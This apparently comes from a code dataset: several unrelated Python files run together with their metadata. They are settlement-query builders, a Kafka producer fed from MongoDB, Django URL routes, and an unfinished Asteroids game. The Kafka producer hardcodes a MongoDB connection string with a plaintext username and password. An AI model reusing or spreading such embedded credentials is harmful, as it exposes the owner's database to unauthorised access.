and2.AddAttrNode('Status', 'NOT_EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.EXCEPTION))\n and2.AddAttrNode('Status', 'NOT_EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.PENDING_AMENDMENT))\n or2 = and2.AddOpNode('OR')\n or2.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.NET))\n or2.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.CLOSE_TRADE_NET))\n or2.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.SECURITIES_DVP_NET))\n\n return CONST_ApplicableForNettingQuery\n\n\ndef GetIsCancelledSettlementQuery():\n global CONST_IsCancelledSettlementQuery\n if CONST_IsCancelledSettlementQuery != None:\n return CONST_IsCancelledSettlementQuery\n\n CONST_IsCancelledSettlementQuery = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n CONST_IsCancelledSettlementQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.VOID))\n\n or1 = CONST_IsCancelledSettlementQuery.AddOpNode('OR')\n or1.AddAttrNode('IsCancelledByTheCounterparty', 'EQUAL', True)\n or1.AddAttrNode('IsCancelledByUs', 'EQUAL', True)\n\n return CONST_IsCancelledSettlementQuery\n\n\ndef GetIsClosingPayoutTradeQuery():\n global CONST_IsClosingPayoutTradeQuery\n if CONST_IsClosingPayoutTradeQuery != None:\n return CONST_IsClosingPayoutTradeQuery\n\n CONST_IsClosingPayoutTradeQuery = acm.CreateFASQLQuery(acm.FTrade, 'AND')\n CONST_IsClosingPayoutTradeQuery.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('TradeType', TradeType.CLOSING))\n or1 = CONST_IsClosingPayoutTradeQuery.AddOpNode('OR')\n or1.AddAttrNode('Instrument.InsType', 'EQUAL', Utils.GetEnum('InsType', InsType.FUTURE_FORWARD))\n or1.AddAttrNode('Instrument.InsType', 'EQUAL', Utils.GetEnum('InsType', InsType.VARIANCE_SWAP))\n return CONST_IsClosingPayoutTradeQuery\n\ndef GetIsClosingTradeQuery():\n global CONST_IsClosingTradeQuery\n if CONST_IsClosingTradeQuery != None:\n return CONST_IsClosingTradeQuery\n CONST_IsClosingTradeQuery = acm.CreateFASQLQuery(acm.FTrade, 'AND')\n CONST_IsClosingTradeQuery.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('TradeType', TradeType.CLOSING))\n return CONST_IsClosingTradeQuery\n\ndef GetIsNDFTradeQuery():\n global CONST_IsNDFTradeQuery\n if CONST_IsNDFTradeQuery != None:\n return CONST_IsNDFTradeQuery\n CONST_IsNDFTradeQuery = acm.CreateFASQLQuery(acm.FTrade, 'AND')\n CONST_IsNDFTradeQuery.AddAttrNode('Instrument.InsType', 'EQUAL', Utils.GetEnum('InsType', InsType.FUTURE_FORWARD))\n CONST_IsNDFTradeQuery.AddAttrNode('Instrument.Underlying.InsType', 'EQUAL', Utils.GetEnum('InsType', InsType.CURR))\n CONST_IsNDFTradeQuery.AddAttrNode('Instrument.SettlementType', 'EQUAL', Utils.GetEnum('SettlementType', SettleType.CASH))\n return CONST_IsNDFTradeQuery\n\ndef IsAdHocNetQuery():\n global CONST_IsAdHocNetQuery\n if CONST_IsAdHocNetQuery != None:\n return CONST_IsAdHocNetQuery\n CONST_IsAdHocNetQuery = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n CONST_IsAdHocNetQuery.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.AD_HOC_NET))\n CONST_IsAdHocNetQuery.AddAttrNode('RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.NONE))\n\n return CONST_IsAdHocNetQuery\n\ndef IsPostReleasedSettlementOrPartOfNetHierarchy():\n global CONST_IsPostReleasedSettlementOrPartOfNetHierarchy\n if CONST_IsPostReleasedSettlementOrPartOfNetHierarchy != None:\n return CONST_IsPostReleasedSettlementOrPartOfNetHierarchy\n 
CONST_IsPostReleasedSettlementOrPartOfNetHierarchy = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n\n and1 = CONST_IsPostReleasedSettlementOrPartOfNetHierarchy.AddOpNode('AND')\n and1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.ACKNOWLEDGED))\n and1.AddAttrNode('Parent', 'EQUAL', None)\n or1 = and1.AddOpNode('OR')\n or1.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.SECURITY_NOMINAL))\n or1.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.AGGREGATE_SECURITY))\n or1.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.END_SECURITY))\n or1.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.SECURITY_DVP))\n\n and2 = CONST_IsPostReleasedSettlementOrPartOfNetHierarchy.AddOpNode('AND')\n and2.AddAttrNode('IsPartOfHierarchy', 'EQUAL', True)\n and2.AddAttrNode('Parent.Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.ACKNOWLEDGED))\n or2 = and2.AddOpNode('OR')\n or2.AddAttrNode('Parent.Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.SECURITY_NOMINAL))\n or2.AddAttrNode('Parent.Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.AGGREGATE_SECURITY))\n or2.AddAttrNode('Parent.Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.END_SECURITY))\n or2.AddAttrNode('Parent.Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.SECURITY_DVP))\n or3 = and2.AddOpNode('OR')\n or3.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.SECURITIES_DVP_NET))\n or3.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.NET))\n\n return CONST_IsPostReleasedSettlementOrPartOfNetHierarchy\n\ndef IsVoidCancelCorrectChild():\n #Retrieves child of settlement with relation type \"Cancel Correct\" or child of settlement\n #of relation type \"Securities DvP Net\" or \"Net\", which is in turn the child of a settlement\n #of relation type \"Cancel Correct\"\n global CONST_IsVoidCancelCorrectChild\n if CONST_IsVoidCancelCorrectChild != None:\n return CONST_IsVoidCancelCorrectChild\n CONST_IsVoidCancelCorrectChild = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n\n CONST_IsVoidCancelCorrectChild.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.VOID))\n\n or1 = CONST_IsVoidCancelCorrectChild.AddOpNode('OR')\n or1.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.CANCEL_CORRECT))\n\n and1 = or1.AddOpNode('AND')\n and1.AddAttrNode('Parent.Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.CANCEL_CORRECT))\n\n or2 = and1.AddOpNode('OR')\n or2.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.SECURITIES_DVP_NET))\n or2.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.NET))\n\n return CONST_IsVoidCancelCorrectChild\n\ndef IsCancelledSettlement():\n global CONST_IsCancelledSettlement\n if CONST_IsCancelledSettlement != None:\n return CONST_IsCancelledSettlement\n CONST_IsCancelledSettlement = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n CONST_IsCancelledSettlement.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.CANCELLED))\n\n return CONST_IsCancelledSettlement\n\ndef IsSecuritySettlementWithStatusReplaced():\n global 
CONST_IsSecuritySettlementWithStatusReplaced\n if CONST_IsSecuritySettlementWithStatusReplaced != None:\n return CONST_IsSecuritySettlementWithStatusReplaced\n CONST_IsSecuritySettlementWithStatusReplaced = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n and1 = CONST_IsSecuritySettlementWithStatusReplaced.AddOpNode('AND')\n and1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.REPLACED))\n and1.AddAttrNode('IsSecurity', 'EQUAL', 'True')\n\n and2 = CONST_IsSecuritySettlementWithStatusReplaced.AddOpNode('AND')\n and2.AddAttrNode('Parent.Oid', 'NOT_EQUAL', 0)\n and2.AddAttrNode('Parent.Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.REPLACED))\n and2.AddAttrNode('Parent.IsSecurity', 'EQUAL', 'True')\n return CONST_IsSecuritySettlementWithStatusReplaced\n\ndef GetSettledSecuritySettlementQuery():\n global CONST_IsSettledSecuritySettlementQuery\n if CONST_IsSettledSecuritySettlementQuery != None:\n return CONST_IsSettledSecuritySettlementQuery\n CONST_IsSettledSecuritySettlementQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n and1 = CONST_IsSettledSecuritySettlementQuery.AddOpNode('AND')\n and1.AddAttrNode('IsSettled', 'EQUAL', True)\n and1.AddAttrNode('IsSecurity', 'EQUAL', True)\n and2 = CONST_IsSettledSecuritySettlementQuery.AddOpNode('AND')\n and2.AddAttrNode('Parent.Oid', 'NOT_EQUAL', 0)\n and2.AddAttrNode('Parent.IsSettled', 'EQUAL', True)\n and2.AddAttrNode('Parent.IsSecurity', 'EQUAL', True)\n return CONST_IsSettledSecuritySettlementQuery\n\ndef GetValueDayAdjustedQuery():\n global CONST_ValueDayAdjustedQuery\n if CONST_ValueDayAdjustedQuery != None:\n return CONST_ValueDayAdjustedQuery\n CONST_ValueDayAdjustedQuery = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n CONST_ValueDayAdjustedQuery.AddAttrNode('Parent.Oid', 'NOT_EQUAL', 0)\n CONST_ValueDayAdjustedQuery.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.VALUE_DAY_ADJUSTED))\n return CONST_ValueDayAdjustedQuery\n","sub_path":"Extensions/Default/FPythonCode/FSettlementStatusQueries.py","file_name":"FSettlementStatusQueries.py","file_ext":"py","file_size_in_byte":29759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"148904100","text":"from confluent_kafka import Producer\nimport sys\n# import time\n# import pymongo\n# from bson.codec_options import CodecOptions\n# import pytz\n\n\ndef go_kafka_rt():\n import pymongo\n from bson.codec_options import CodecOptions\n import pytz\n import time\n\n client = pymongo.MongoClient(\"mongodb+srv://eks210017:eks210017@cluster0.yrvuu.mongodb.net/mydatabase?retryWrites=true&w=majority\")\n options = CodecOptions(tz_aware=True, tzinfo=pytz.timezone('Asia/Taipei'))\n db = client.get_default_database(codec_options=options)\n\n # items_green_tea = db.items.find_one({'item_name': 'GreenTea'}, {'_id': 0})\n # t_time_gt = items_green_tea['date'].strftime('%Y-%m-%d %H:%M:%S')\n # taiwan_time_gt = db.items.update_one({'item_name': \"GreenTea\"}, {'$set': {'taiwan_time': t_time_gt}})\n\n items_red_tea = db.items.find_one({'item_name': 'RedTea'}, {'_id': 0})\n t_time_rt = items_red_tea['date'].strftime('%Y-%m-%d %H:%M:%S')\n taiwan_time_rt = db.items.update_one({'item_name': \"RedTea\"}, {'$set': {'taiwan_time': t_time_rt}})\n\n # items_milk_tea = db.items.find_one({'item_name': 'MilkTea'}, {'_id': 0})\n # t_time_mt = items_milk_tea['date'].strftime('%Y-%m-%d %H:%M:%S')\n # taiwan_time_mt = db.items.update_one({'item_name': \"MilkTea\"}, {'$set': 
{'taiwan_time': t_time_mt}})\n\n    # print(items_coke['item_name'], items_coke['user_take'], items_coke['price'])\n    # print(items_tea['item_name'], items_tea['user_take'], items_tea['price'])\n\n    # Used to receive error messages emitted from the Consumer instance\n    def error_cb(err):\n        print('Error: %s' % err)\n\n\n    props = {\n        # Where is the Kafka cluster? 10.1.0.87:9092\n        'bootstrap.servers': '10.1.0.87:9092',   # <-- replace with the Kafka cluster to connect to\n        'error_cb': error_cb  # set the callback function that receives error messages\n    }\n    # Step 2. Create an instance of a Kafka Producer\n    producer = Producer(props)\n    # Step 3. Specify the name of the topic to publish messages to\n    # topicName_1 = 'items'\n    topicName_2 = 'items2'\n    # topicName_3 = 'items3'\n    msgCounter = 0\n    try:\n        # produce(topic, [value], [key], [partition], [on_delivery], [timestamp], [headers])\n        # producer.produce(topicName_1, '{} 數量: {} 價格: {} date: {}'.format(items_green_tea['item_name'], items_green_tea['user_take'], items_green_tea['price'], items_green_tea['taiwan_time']), '商品')\n        producer.produce(topicName_2, '紅茶 數量: {} 價格: {} '.format(items_red_tea['user_take'], items_red_tea['price']), '商品2')\n        # producer.produce(topicName_3, '{} 數量: {} 價格: {} date: {}'.format(items_milk_tea['item_name'], items_milk_tea['user_take'], items_milk_tea['price'], items_milk_tea['taiwan_time']), '商品')\n        producer.flush()\n        # msgCounter += 2\n        print('Send ' + ' messages to Kafka')\n    except BufferError as e:\n        # Error handling\n        sys.stderr.write('%% Local producer queue is full ({} messages awaiting delivery): try again\\n'\n                         .format(len(producer)))\n    except Exception as e:\n        print(e)\n    # Step 5. Make sure all messages still in the buffer have been sent to Kafka\n    producer.flush()\n","sub_path":"Flask/kafka_producer_mt.py","file_name":"kafka_producer_mt.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"503726280","text":"from django.contrib.auth.decorators import login_required\r\nfrom django.conf import settings\r\nfrom django.conf.urls import url, include, i18n\r\nfrom . 
import views, views_md, views_hlq, views_cra, views_ass\r\nfrom django.conf.urls.static import static\r\n\r\nurlpatterns = [ \r\n \r\n # index\r\n url(r'^$', \r\n views.index, \r\n name='index'), \r\n \r\n # Authentication\r\n #url('^', include('django.contrib.auth.urls')), \r\n url(r'^login/$', \r\n views.user_login, \r\n name='login'),\r\n \r\n url(r'^logout/$', \r\n views.user_logout, \r\n name='logout'),\r\n \r\n # HighLevelQuestionnaire \r\n \r\n url(r'^hlq/$',\r\n views_hlq.hlq_list,\r\n name='hlq_list'),\r\n \r\n url(r'^hlq/create/$',\r\n views_hlq.hlq_create,\r\n name='hlq_create'),\r\n \r\n url(r'^hlq/(?P[0-9]+)/update/$',\r\n views_hlq.hlq_update,\r\n name='hlq_update'),\r\n \r\n url(r'^hlq/(?P[0-9]+)/delete/$',\r\n views_hlq.hlq_delete,\r\n name='hlq_delete'),\r\n \r\n url(r'^hlq/(?P[0-9]+)/$',\r\n views_hlq.hlq_app_list,\r\n name='hlq_app_list'),\r\n \r\n # HighLevelQuestionnaire-Application \r\n \r\n url(r'^hlq/(?P[0-9]+)/create',\r\n views_hlq.hlq_app_create,\r\n name='hlq_app_create'),\r\n \r\n url(r'^hlq_app/(?P[0-9]+)/update/$',\r\n views_hlq.hlq_app_update,\r\n name='hlq_app_update'),\r\n \r\n url(r'^hlq_app/(?P[0-9]+)/delete/$',\r\n views_hlq.hlq_app_delete,\r\n name='hlq_app_delete'),\r\n \r\n \r\n # CloudReadinessAssessment \r\n \r\n url(r'^cra/$',\r\n views_cra.cra_list,\r\n name='cra_list'),\r\n \r\n url(r'^cra/create/$',\r\n views_cra.cra_create,\r\n name='cra_create'),\r\n \r\n url(r'^cra/(?P[0-9]+)/update/$',\r\n views_cra.cra_update,\r\n name='cra_update'),\r\n \r\n url(r'^cra/(?P[0-9]+)/delete/$',\r\n views_cra.cra_delete,\r\n name='cra_delete'),\r\n \r\n url(r'^cra/(?P[0-9]+)/$',\r\n views_cra.cra_app_list,\r\n name='cra_app_list'),\r\n \r\n # CloudReadinessAssessment-Application \r\n \r\n url(r'^cra/(?P[0-9]+)/create',\r\n views_cra.cra_app_create,\r\n name='cra_app_create'),\r\n \r\n url(r'^cra_app/(?P[0-9]+)/update/$',\r\n views_cra.cra_app_update,\r\n name='cra_app_update'),\r\n \r\n url(r'^cra_app/(?P[0-9]+)/delete/$',\r\n views_cra.cra_app_delete,\r\n name='cra_app_delete'),\r\n \r\n # Assessment \r\n \r\n url(r'^ass/$',\r\n views_ass.ass_list,\r\n name='ass_list'),\r\n\r\n url(r'^ass/create/$',\r\n views_ass.ass_create,\r\n name='ass_create'),\r\n \r\n url(r'^ass/(?P[0-9]+)/update/$',\r\n views_ass.ass_update,\r\n name='ass_update'),\r\n \r\n url(r'^ass/(?P[0-9]+)/delete/$',\r\n views_ass.ass_delete,\r\n name='ass_delete'),\r\n \r\n url(r'^ass/(?P[0-9]+)/export/$',\r\n views_ass.ass_export,\r\n name='ass_export'),\r\n \r\n # Assessment-Application \r\n \r\n url(r'^ass/(?P[0-9]+)/$',\r\n views_ass.ass_app_list,\r\n name='ass_app_list'),\r\n \r\n url(r'^ass/(?P[0-9]+)/create',\r\n views_ass.ass_app_create,\r\n name='ass_app_create'),\r\n \r\n url(r'^ass_app/(?P[0-9]+)/update/$',\r\n views_ass.ass_app_update,\r\n name='ass_app_update'),\r\n \r\n url(r'^ass_app/(?P[0-9]+)/delete/$',\r\n views_ass.ass_app_delete,\r\n name='ass_app_delete'),\r\n \r\n # Assessment-Application-Documents \r\n \r\n url(r'^ass_app/(?P[0-9]+)/doc/$',\r\n views_ass.ass_app_doc_form,\r\n name='ass_app_doc_form'),\r\n \r\n # Assessment-Application-Server \r\n \r\n url(r'^ass_app/(?P[0-9]+)/srv_list/$',\r\n views_ass.ass_app_srv_list,\r\n name='ass_app_srv_list'),\r\n \r\n url(r'^ass_app/(?P[0-9]+)/srv_create',\r\n views_ass.ass_app_srv_create,\r\n name='ass_app_srv_create'),\r\n\r\n url(r'^ass_app/(?P[0-9]+)/srv_saveas',\r\n views_ass.ass_app_srv_saveas,\r\n name='ass_app_srv_saveas'),\r\n\r\n url(r'^ass_app_srv/(?P[0-9]+)/update/$',\r\n views_ass.ass_app_srv_update,\r\n 
name='ass_app_srv_update'),\r\n \r\n url(r'^ass_app_srv/(?P[0-9]+)/delete/$',\r\n views_ass.ass_app_srv_delete,\r\n name='ass_app_srv_delete'),\r\n \r\n # Assessment-Application-Interface\r\n \r\n url(r'^ass_app/(?P[0-9]+)/int_list/$',\r\n views_ass.ass_app_int_list,\r\n name='ass_app_int_list'),\r\n \r\n url(r'^ass_app/(?P[0-9]+)/int_create',\r\n views_ass.ass_app_int_create,\r\n name='ass_app_int_create'),\r\n \r\n url(r'^ass_app_int/(?P[0-9]+)/update/$',\r\n views_ass.ass_app_int_update,\r\n name='ass_app_int_update'),\r\n \r\n url(r'^ass_app_int/(?P[0-9]+)/delete/$',\r\n views_ass.ass_app_int_delete,\r\n name='ass_app_int_delete'),\r\n \r\n url(r'^ass_app_int/(?P[0-9]+)/delete/$',\r\n views_ass.ass_app_int_delete,\r\n name='ass_app_int_delete'),\r\n \r\n # Master data - Location \r\n \r\n url(r'^location/(?P[0-9]+)/delete/$',\r\n login_required(views_md.LocationDelete.as_view()),\r\n name='location_delete'),\r\n \r\n url(r'^location/(?P[0-9]+)/update/$',\r\n login_required(views_md.LocationUpdate.as_view()),\r\n name='location_update'),\r\n \r\n url(r'^location/create/$',\r\n login_required(views_md.LocationCreate.as_view()),\r\n name='location_create'),\r\n \r\n url(r'^location/$',\r\n login_required(views_md.LocationList.as_view()),\r\n name='location_list'),\r\n\r\n url(r'^add/location/?$',\r\n views_ass.location_addrelated),\r\n\r\n # Master data - AppCategory\r\n \r\n url(r'^appcategory/(?P[0-9]+)/delete/$',\r\n views_md.AppCategoryDelete.as_view(),\r\n name='appcategory_delete'),\r\n \r\n url(r'^appcategory/(?P[0-9]+)/update/$',\r\n views_md.AppCategoryUpdate.as_view(),\r\n name='appcategory_update'),\r\n \r\n url(r'^appcategory/create/$',\r\n views_md.AppCategoryCreate.as_view(),\r\n name='appcategory_create'),\r\n \r\n url(r'^appcategory/$',\r\n views_md.AppCategoryList.as_view(),\r\n name='appcategory_list'),\r\n\r\n url(r'^add/app_category/?$',\r\n views_ass.app_category_addrelated),\r\n \r\n # Master data - AppVendor\r\n \r\n url(r'^appvendor/(?P[0-9]+)/delete/$',\r\n views_md.AppVendorDelete.as_view(),\r\n name='appvendor_delete'),\r\n \r\n url(r'^appvendor/(?P[0-9]+)/update/$',\r\n views_md.AppVendorUpdate.as_view(),\r\n name='appvendor_update'),\r\n \r\n url(r'^appvendor/create/$',\r\n views_md.AppVendorCreate.as_view(),\r\n name='appvendor_create'),\r\n \r\n url(r'^appvendor/$',\r\n views_md.AppVendorList.as_view(),\r\n name='appvendor_list'),\r\n\r\n url(r'^add/app_vendor/?$',\r\n views_ass.app_vendor_addrelated),\r\n \r\n # Master data - Authentication type \r\n \r\n url(r'^authenticationtype/(?P[0-9]+)/delete/$',\r\n views_md.AuthenticationTypeDelete.as_view(),\r\n name='authenticationtype_delete'),\r\n \r\n url(r'^authenticationtype/(?P[0-9]+)/update/$',\r\n views_md.AuthenticationTypeUpdate.as_view(),\r\n name='authenticationtype_update'),\r\n \r\n url(r'^authenticationtype/create/$',\r\n views_md.AuthenticationTypeCreate.as_view(),\r\n name='authenticationtype_create'),\r\n \r\n url(r'^authenticationtype/$',\r\n views_md.AuthenticationTypeList.as_view(),\r\n name='authenticationtype_list'),\r\n\r\n url(r'^add/authentication_type/?$',\r\n views_ass.authentication_type_addrelated),\r\n \r\n # Master data - Database system \r\n \r\n url(r'^databasesystem/(?P[0-9]+)/delete/$',\r\n views_md.DatabaseSystemDelete.as_view(),\r\n name='databasesystem_delete'),\r\n \r\n url(r'^databasesystem/(?P[0-9]+)/update/$',\r\n views_md.DatabaseSystemUpdate.as_view(),\r\n name='databasesystem_update'),\r\n \r\n url(r'^databasesystem/create/$',\r\n 
views_md.DatabaseSystemCreate.as_view(),\r\n name='databasesystem_create'),\r\n \r\n url(r'^databasesystem/$',\r\n views_md.DatabaseSystemList.as_view(),\r\n name='databasesystem_list'),\r\n\r\n url(r'^add/database_system/?$',\r\n views_ass.database_system_addrelated),\r\n \r\n # Master data - Interface type \r\n \r\n url(r'^interfacetype/(?P[0-9]+)/delete/$',\r\n views_md.InterfaceTypeDelete.as_view(),\r\n name='interfacetype_delete'),\r\n \r\n url(r'^interfacetype/(?P[0-9]+)/update/$',\r\n views_md.InterfaceTypeUpdate.as_view(),\r\n name='interfacetype_update'),\r\n \r\n url(r'^interfacetype/create/$',\r\n views_md.InterfaceTypeCreate.as_view(),\r\n name='interfacetype_create'),\r\n \r\n url(r'^interfacetype/$',\r\n views_md.InterfaceTypeList.as_view(),\r\n name='interfacetype_list'),\r\n \r\n url(r'^add/interface_type/?$',\r\n views_ass.interfacetype_addrelated,\r\n name='ass_app_interfacetype_addrelated'),\r\n \r\n # Master data - Operating system \r\n \r\n url(r'^operatingsystem/(?P[0-9]+)/delete/$',\r\n views_md.OperatingSystemDelete.as_view(),\r\n name='operatingsystem_delete'),\r\n \r\n url(r'^operatingsystem/(?P[0-9]+)/update/$',\r\n views_md.OperatingSystemUpdate.as_view(),\r\n name='operatingsystem_update'),\r\n \r\n url(r'^operatingsystem/create/$',\r\n views_md.OperatingSystemCreate.as_view(),\r\n name='operatingsystem_create'),\r\n \r\n url(r'^operatingsystem/$',\r\n views_md.OperatingSystemList.as_view(),\r\n name='operatingsystem_list'),\r\n\r\n url(r'^add/operating_system/?$',\r\n views_ass.operating_system_addrelated),\r\n\r\n # Master data - contact\r\n \r\n url(r'^contact/(?P[0-9]+)/delete/$',\r\n views_md.ContactDelete.as_view(),\r\n name='contact_delete'),\r\n \r\n url(r'^contact/(?P[0-9]+)/update/$',\r\n views_md.ContactUpdate.as_view(),\r\n name='contact_update'),\r\n \r\n url(r'^contact/create/$',\r\n views_md.ContactCreate.as_view(),\r\n name='contact_create'),\r\n \r\n url(r'^contact/$',\r\n views_md.ContactList.as_view(),\r\n name='contact_list'),\r\n \r\n url(r'^add/app_manager/?$',\r\n views_ass.app_manager_addrelated),\r\n\r\n url(r'^add/business_expert/?$',\r\n views_ass.business_expert_addrelated),\r\n\r\n url(r'^add/app_architect/?$',\r\n views_ass.app_architect_addrelated),\r\n\r\n url(r'^add/it_coordinator/?$',\r\n views_ass.it_coordinator_addrelated),\r\n\r\n url(r'^add/migration_manager/?$',\r\n views_ass.migration_manager_addrelated),\r\n\r\n url(r'^add/migration_lead/?$',\r\n views_ass.migration_lead_addrelated),\r\n\r\n url(r'^add/migration_coordinator/?$',\r\n views_ass.migration_coordinator_addrelated),\r\n\r\n url(r'^add/technical_expert/?$',\r\n views_ass.technical_expert_addrelated),\r\n\r\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\r\n","sub_path":"app_ac/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":11292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"509904944","text":"from screen import Screen\nimport sys\n\n# my imports\nfrom random import randint\nfrom math import cos, sin, radians\nfrom ship import *\nfrom asteroid import *\nfrom torepdo import *\n\nDEFAULT_ASTEROIDS_NUM = 5\n\n# my assignments\nASTEROIDS_SIZE = 3\nTORPEDO_RADIUS = 4\nTORPEDO_LIFE_TIME = 200\nRETRIES_AMOUNT = 3\nDEFAULT_SHIP_HEADING = 0.0\nHIT_ASTEROID_TITLE = \"You got hit!\"\nHIT_ASTEROID = \"You got hit by an asteroid bruh, careful!\"\nLOSE_TITLE = \"You lost BRUHHHHHHHHH!\"\nLOSE_MSG = \"You lost. 
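# --- Aside: every master-data model above repeats the same list/create/
# update/delete url() quartet. A sketch of one way to factor that out with
# a hypothetical helper (the named group is assumed to be <pk>, matching
# the keyword the views would receive; the original patterns do not show it):
def crud_urls(prefix, list_view, create_view, update_view, delete_view):
    return [
        url(r'^{}/$'.format(prefix), list_view, name='{}_list'.format(prefix)),
        url(r'^{}/create/$'.format(prefix), create_view, name='{}_create'.format(prefix)),
        url(r'^{}/(?P<pk>[0-9]+)/update/$'.format(prefix), update_view, name='{}_update'.format(prefix)),
        url(r'^{}/(?P<pk>[0-9]+)/delete/$'.format(prefix), delete_view, name='{}_delete'.format(prefix)),
    ]
# e.g. urlpatterns += crud_urls('contact',
#                               views_md.ContactList.as_view(),
#                               views_md.ContactCreate.as_view(),
#                               views_md.ContactUpdate.as_view(),
#                               views_md.ContactDelete.as_view())
# --- end aside ---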
Next time :) (bruh)\"\nWON_TITLE = \"You won!\"\nWON_MSG = \"BRUHHH you won whoooo!\"\n\n\nclass GameRunner:\n\n def __init__(self, asteroids_amount):\n self.__screen = Screen()\n\n self.__screen_max_x = Screen.SCREEN_MAX_X\n self.__screen_max_y = Screen.SCREEN_MAX_Y\n self.__screen_min_x = Screen.SCREEN_MIN_X\n self.__screen_min_y = Screen.SCREEN_MIN_Y\n\n # my assignments\n print(\"Starting...\")\n self.__asteroids_amount = asteroids_amount\n self.__asteroids_objects = []\n self.__torpedo_objects = []\n self.__is_start = True\n self.__avg_x = self.__screen_max_x - self.__screen_min_x\n self.__avg_y = self.__screen_max_y - self.__screen_min_y\n self.__ship_angle = 0\n self.__ship = Ship(x=0, y=0, speed_x=0, speed_y=0, angle=0, radius=1)\n self.__lives = 3\n self.__is_torpedo_launched = False\n self.__score = RETRIES_AMOUNT\n self.spawn_asteroids()\n\n # ----GENERAL METHODS----\n\n def run(self):\n self._do_loop()\n self.__screen.start_screen()\n\n def _do_loop(self):\n # You should not to change this method!\n self._game_loop()\n # Set the timer to go off again\n self.__screen.update()\n self.__screen.ontimer(self._do_loop, 5)\n\n def check_if_keys_pressed(self):\n \"\"\"\n this method will check if any of the specific keys have been pressed\n :return:\n \"\"\"\n\n self.check_win()\n if self.__screen.is_up_pressed() == 1:\n self.speed_up()\n elif self.__screen.is_right_pressed() == 1:\n self.change_angle(True, False)\n elif self.__screen.is_left_pressed() == 1:\n self.change_angle(False, True)\n elif self.__screen.is_space_pressed() == 1:\n self.spawn_torpedo()\n elif self.__screen.should_end():\n print(\"[!] Player exited\")\n self.__screen.end_game()\n sys.exit(0)\n\n def check_win(self):\n \"\"\"\n this method will check if the player has won\n :return: false if he didn't win\n \"\"\"\n\n if len(self.__asteroids_objects) == 0:\n self.__screen.show_message(WON_TITLE, WON_MSG)\n self.__screen.end_game()\n print(\"Player won\")\n sys.exit(0)\n elif self.__lives == 0:\n self.__screen.show_message(LOSE_TITLE, LOSE_MSG)\n self.__screen.end_game()\n print(\"Player lost\")\n sys.exit(0)\n return False\n\n def set_score(self, asteroid_obj):\n \"\"\"\n this method will update the score according to the asteroid size\n :param asteroid_obj: according to size of asteroid obj\n :return:\n \"\"\"\n\n if asteroid_obj.return_size() == 3:\n self.__score += 20\n elif asteroid_obj.return_size() == 2:\n self.__score += 50\n else: # asteroid with 1 size\n self.__score += 100\n self.__screen.set_score(self.__score) # updating\n\n def _game_loop(self):\n self.check_win()\n self.spawn_ship()\n self.move_asteroids()\n self.check_if_keys_pressed()\n self.move_ship()\n if len(self.__torpedo_objects) > 0: # to check the torpedoes status and move him\n for torpedo in self.__torpedo_objects:\n torpedo.add_to_life_time()\n self.check_torpedo_time(torpedo)\n self.move_torpedo()\n\n # ----SHIP METHODS----\n\n def change_angle(self, right_bool, left_bool):\n \"\"\"\n this method will change the angle of the ship,\n according to the player keystrokes\n :param right_bool: true if he wanted to move right\n :type right_bool: bool\n :param left_bool: true if he wanted to move left\n :type left_bool: bool\n :return: angle of ship\n \"\"\"\n\n if right_bool:\n self.__ship_angle -= 7\n elif left_bool:\n self.__ship_angle += 7\n return 